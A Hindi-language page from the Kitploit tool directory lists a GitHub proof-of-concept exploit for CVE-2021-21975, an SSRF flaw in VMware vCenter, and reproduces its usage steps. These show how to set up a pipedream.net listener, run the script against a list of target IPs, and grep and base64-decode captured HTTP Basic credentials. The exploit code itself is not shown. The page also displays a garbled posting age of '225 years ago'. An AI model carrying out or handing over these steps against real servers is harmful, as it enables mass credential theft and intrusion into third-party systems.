Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-21975 — CVE-2021-21975 (VMware vCenter Server SSRF) के लिए अवधारणा-सिद्ध शोषण जो सर्वर-साइड अनुरोध जालसाजी का उपयोग करके HTTP बेसिक प्रमाणीकरण के माध्यम से base64-एन्कोडेड प्रमाण-पत्र लीक करता है। | Kitploit
उपकरण/GitHubGitHub/dorkerdevil/cve-2021-21975
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करना
GitHubdorkerdevil/cve-2021-21975

CVE-2021-21975

CVE-2021-21975 (VMware vCenter Server SSRF) के लिए अवधारणा-सिद्ध शोषण जो सर्वर-साइड अनुरोध जालसाजी का उपयोग करके HTTP बेसिक प्रमाणीकरण के माध्यम से base64-एन्कोडेड प्रमाण-पत्र लीक करता है।

रिपॉजिटरी देखें
225 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-21975

#SSRF-POC - ssrf से क्रेड लीक

#पहले pd क्लाइंट कॉन्फ़िगर करें।

#अब ./pd deploy http-new-requests चलाएँ

#अब स्क्रिप्ट में pipedream HTTP अनुरोध उदाहरण: Randomstring.m.pipedream.net को बदलें

#इसे एक अलग टर्मिनल में चलाएँ - ./pd logs new-requests | tee -a req.txt

#और अब इसे दूसरे टर्मिनल में चलाएँ - python3 CVE-2021-21975.py iplist

#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt

"यह एक प्रारंभिक प्रूफ ऑफ कॉन्सेप्ट है जो तब बनाया गया था जब यह कमजोरी महीनों पहले सार्वजनिक हुई थी, इसलिए इसे अपने जोखिम पर उपयोग करें।" :V

#श्रेय @wabaf3t @D0rkerDevil

टूल डाउनलोड करें